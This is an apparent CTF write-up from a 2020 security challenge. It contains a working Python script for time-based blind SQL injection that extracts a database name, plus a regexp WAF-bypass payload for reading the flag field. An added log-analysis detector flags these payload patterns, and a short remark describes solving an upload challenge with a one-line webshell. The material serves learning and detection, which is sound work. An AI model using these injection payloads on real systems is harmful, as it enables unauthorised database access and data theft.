2020 New Year "Fight the Epidemic" public network security challenge, day one: blind injection notes

0x00 Still feel like I'm too much of a noob

0x01 Brute-forcing the database name:

Testing showed the WAF filters = < > and select.

Here is the script that blind-injects the database name directly:

import time
import requests

def http_blindTime_get(url, payload):
    # Record the time the request is sent
    starttime = time.time()
    requests.get(url + payload)
    # Record the time the response arrives
    endtime = time.time()
    # The injected sleep() only fires when the condition is true, so a
    # round trip slower than 3 s means the guess was right
    if endtime - starttime < 3:
        return False
    else:
        return True

# Get the database name via GET; the payload is built from the function variables
def getDatabaseName(url):
    # First get the length of the database name; guessed it won't be longer than
    # 16 characters, hence range(0, 15)
    # Logic: when the length guess is right the database sleeps 5 seconds, so
    # break once the round-trip time exceeds 3 s (regexp is a substring match,
    # not equality, so this relies on the length being a single digit)
    databaselength = 0
    for i in range(0, 15):
        payload = "index.php?id=233333||if((length(database())%20regexp%20" + str(i) + "),sleep(5),2)"
        if http_blindTime_get(url, payload):
            databaselength = i
            break
    print('Database name length:', str(databaselength))
    if databaselength == 0:
        return False
    else:
        # A non-zero length means it was found; now brute-force the name one character at a time
        databasename = ""
        for i in range(1, databaselength + 1):
            for j in range(50, 128):
                payload = "index.php?id=23333||if((ascii(substr(database()," + str(i) + ",1))%20regexp%20" + str(j) + "),sleep(5),2)"
                if http_blindTime_get(url, payload):
                    print('Found code: ' + str(j))
                    databasename += chr(j)
                    break
        print('Database name:', str(databasename))
        return databasename

def main():
    url = "http://36ca1c4d3df24bd3ae5e3b03df1f3379f351f0edfad943d4.changame.ichunqiu.com/"
    getDatabaseName(url)
    # get_all_databases("http://192.168.110.167/web/web26/")

if __name__ == '__main__':
    main()

Running the code recovers the database name through time-based blind injection.

Then I was stuck on how to get around the select filter. According to the solutions from the experts, since the challenge tells us the flag is in the field fl4g, there is no need to dump the table and column names again, so you can use regexp directly for the bypass:

Change the payload to: payload = " if((substr((fl4g),i,1) regexp "+chr+"),sleep(3),1)"
# equivalent to 1 and if(fl4g = regexp 'flag{' + alphabet, sleep(5), 1)

With this payload, build an alphabet from the ASCII table and try each character in turn to brute-force the flag.
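On the defensive side, as an added example that is not from the original post: a small Python detector that URL-decodes the request paths in a web access log and flags the time-based blind injection shapes used above (if() wrapped around sleep(), regexp standing in for the filtered =, and database()/substr()/ascii() probes), while also recording the slow response time the delay itself leaves in the log. The log format, the IP addresses and the log lines are all constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (not from the original post): the payload shapes
# used above plus benign traffic. The last field is the response time in seconds.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Jan/2020:10:00:01 +0800] "GET /index.php?id=1 HTTP/1.1" 200 512 0.012
10.0.0.5 - - [31/Jan/2020:10:00:02 +0800] "GET /index.php?id=233333||if((length(database())%20regexp%205),sleep(5),2) HTTP/1.1" 200 512 5.018
10.0.0.5 - - [31/Jan/2020:10:00:09 +0800] "GET /index.php?id=23333||if((ascii(substr(database(),1,1))%20regexp%20102),sleep(5),2) HTTP/1.1" 200 512 5.021
10.0.0.9 - - [31/Jan/2020:10:00:10 +0800] "GET /index.php?id=1%20if((substr((fl4g),1,1)%20regexp%20f),sleep(3),1) HTTP/1.1" 200 512 3.007
10.0.0.7 - - [31/Jan/2020:10:00:11 +0800] "GET /static/app.js HTTP/1.1" 200 9001 0.003
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d+) \S+ (?P<rt>[\d.]+)$')
# Indicators drawn from the payloads in this write-up: a sleep()/benchmark() delay,
# an if() wrapped around it, regexp standing in for the filtered '=', and schema probes.
INDICATORS = [
    ("sleep_call", re.compile(r"\bsleep\s*\(", re.I)),
    ("benchmark_call", re.compile(r"\bbenchmark\s*\(", re.I)),
    ("conditional_delay", re.compile(r"\bif\s*\(.*\b(sleep|benchmark)\s*\(", re.I | re.S)),
    ("regexp_compare", re.compile(r"\b(regexp|rlike)\b", re.I)),
    ("schema_probe", re.compile(r"\b(database|substr|ascii)\s*\(", re.I)),
]

def analyse_line(line, slow_threshold=2.5):
    """Parse one log line; return None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # WAF bypasses hide behind URL encoding, so decode before pattern matching.
    decoded = unquote_plus(m.group("path"))
    hits = [name for name, rx in INDICATORS if rx.search(decoded)]
    rt = float(m.group("rt"))
    return {"ip": m.group("ip"), "path": decoded, "indicators": hits,
            "slow": rt >= slow_threshold, "suspicious": bool(hits)}

def find_blind_sqli(log_text):
    """Return the records that carry at least one injection indicator."""
    records = (analyse_line(l) for l in log_text.splitlines() if l.strip())
    return [r for r in records if r and r["suspicious"]]
def per_ip_summary(records):
    # Blind injection needs one request per candidate character, so the number
    # of flagged requests per source IP makes the brute-force burst stand out.
    counts = {}
    for r in records:
        counts[r["ip"]] = counts.get(r["ip"], 0) + 1
    return counts
```

The slow flag is kept separate from the indicator hits so that a delay alone (a legitimately slow page) does not raise an alert, but a flagged request that is also slow is strong evidence the injected condition was true.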

Also, the writeup for ezupload:

There is no filter, it is a direct file upload; after uploading a one-line webshell, readflag is found in the root directory, and running ./readflag directly gets the flag ......

I heard this was the challenge that a lot of people crashed and burned on......


Origin blog.csdn.net/shuaicenglou3032/article/details/104436338